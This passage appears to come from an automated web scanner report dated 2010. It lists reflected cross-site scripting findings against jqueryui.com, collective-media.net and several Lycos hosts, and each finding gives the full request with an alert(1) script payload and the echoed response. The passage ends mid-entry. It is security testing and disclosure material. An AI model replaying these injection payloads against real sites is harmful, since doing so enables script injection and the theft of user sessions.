This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px6323d"><script>alert(1)</script>e503afc2b&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120061

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px6323d"><script>alert(1)</script>e503afc2b&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.112. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7b29"><script>alert(1)</script>6aefc48648e was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8pxa7b29"><script>alert(1)</script>6aefc48648e&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:51 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
aaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8pxa7b29"><script>alert(1)</script>6aefc48648e&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.113. http://jqueryui.com/themeroller/ [opacityOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d012"><script>alert(1)</script>1062076bf26 was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=305d012"><script>alert(1)</script>1062076bf26&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:35 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=305d012"><script>alert(1)</script>1062076bf26&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all
...[SNIP]...

1.114. http://jqueryui.com/themeroller/ [opacityShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd14c"><script>alert(1)</script>f7a209fba9 was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30dd14c"><script>alert(1)</script>f7a209fba9&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120064

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30dd14c"><script>alert(1)</script>f7a209fba9&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.115. http://jqueryui.com/themeroller/ [thicknessShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5e33"><script>alert(1)</script>b5761ac56ec was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8pxc5e33"><script>alert(1)</script>b5761ac56ec&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8pxc5e33"><script>alert(1)</script>b5761ac56ec&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.116. http://k.collective-media.net/cmadj/cm.idg_b2c/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.idg_b2c/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b947'-alert(1)-'faa1d4c7922 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.idg_b2c5b947'-alert(1)-'faa1d4c7922/;sz=728x90;net=cm;ord=5241744;env=ifr;ord1=854900;cmpgurl=http%253A//mail.lycos.com/lycos/Index.lycos? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.mail.lycos.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=dal

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sun, 12 Dec 2010 14:27:46 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
Content-Length: 7380

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-57666374_1292164066","http://ib.adnxs.com/ptj?member=311&inv_code=cm.idg_b2c5b947'-alert(1)-'faa1d4c7922&size=728x90&referrer=http%3A%2F%2Fmail.lycos.com%2Flycos%2FIndex.lycos&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.idg_b2c5b947%27-alert%281%29-%27faa1d4c7922%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-57666374_1
...[SNIP]...

1.117. http://k.collective-media.net/cmadj/cm.idg_b2c/ [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.idg_b2c/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee53c'-alert(1)-'3c2da3549e8 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.idg_b2c/;sz=ee53c'-alert(1)-'3c2da3549e8 HTTP/1.1
Host: k.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc-dal; optout=1; JY57=opt_out;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7288
Date: Sun, 12 Dec 2010 14:34:24 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-41320597_1292164464","http://ib.adnxs.com/ptj?member=311&inv_code=cm.idg_b2c&size=ee53c'-alert(1)-'3c2da3549e8&referrer=&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.idg_b2c%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-41320597_1292164464%2C%2Cnone%2C%3B%3Bcmw%3Dnurl%3Bsz%3Dee53c%27-alert%281%29-%273c2da3549e8%3Bcontx%3Dnone
...[SNIP]...

1.118. http://peoplesearch.lycos.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://peoplesearch.lycos.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2147"><script>alert(1)</script>caa0e56bdf9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tab=people&b2147"><script>alert(1)</script>caa0e56bdf9=1 HTTP/1.1
Host: peoplesearch.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; PENTA=174.121.222.18.1292163893857460

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:28:52 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19486

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://search.lycos.com/?tab=people&b2147"><script>alert(1)</script>caa0e56bdf9=1&mobile=1">
...[SNIP]...

1.119. http://peoplesearch.lycos.com/ [search-type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://peoplesearch.lycos.com
Path:   /

Issue detail

The value of the search-type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f361d"><script>alert(1)</script>60b9214b859 was submitted in the search-type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tab=people&search-type=white_pagesf361d"><script>alert(1)</script>60b9214b859 HTTP/1.1
Host: peoplesearch.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163885.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.686581957.1292163885.1292163885.1292163885.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.3.10.1292163885;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:41 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://search.lycos.com/?tab=people&search-type=white_pagesf361d"><script>alert(1)</script>60b9214b859&mobile=1">
...[SNIP]...

1.120. http://peoplesearch.lycos.com/ [tab parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://peoplesearch.lycos.com
Path:   /

Issue detail

The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7863b"><script>alert(1)</script>a804a600e0d was submitted in the tab parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tab=people7863b"><script>alert(1)</script>a804a600e0d HTTP/1.1
Host: peoplesearch.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; PENTA=174.121.222.18.1292163893857460

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:28:46 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://search.lycos.com/?tab=people7863b"><script>alert(1)</script>a804a600e0d&mobile=1">
...[SNIP]...

1.121. http://peoplesearch.lycos.com/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://peoplesearch.lycos.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 353e6"><script>alert(1)</script>5876eddc96c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?353e6"><script>alert(1)</script>5876eddc96c=1 HTTP/1.1
Host: peoplesearch.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163885.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.686581957.1292163885.1292163885.1292163885.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.3.10.1292163885;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:46 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19469

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://search.lycos.com/?353e6"><script>alert(1)</script>5876eddc96c=1&mobile=1">
...[SNIP]...

1.122. http://registration.lycos.com/forgot.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://registration.lycos.com
Path:   /forgot.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f715"><script>alert(1)</script>0a78a0c622c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /forgot.php/4f715"><script>alert(1)</script>0a78a0c622c HTTP/1.1
Host: registration.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:51 GMT
Server:
Set-Cookie: PENTA=174.121.222.18.1292164491267196; path=/; domain=.lycos.com
X-Powered-By: PHP/5.1.6
Set-Cookie: isMobile=deleted; expires=Sat, 12-Dec-2009 14:34:50 GMT
Set-Cookie: isMobile=mobile; expires=Sun, 12-Dec-2010 15:34:51 GMT; path=/; domain=lycos.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Content-Length: 5935
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>LYCOS NETWORK: Registration Forgot Password</title>

<script src="http://hb
...[SNIP]...
<form action="/forgot.php/4f715"><script>alert(1)</script>0a78a0c622c" method="post">
...[SNIP]...

1.123. http://search.lycos.com/ [cat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

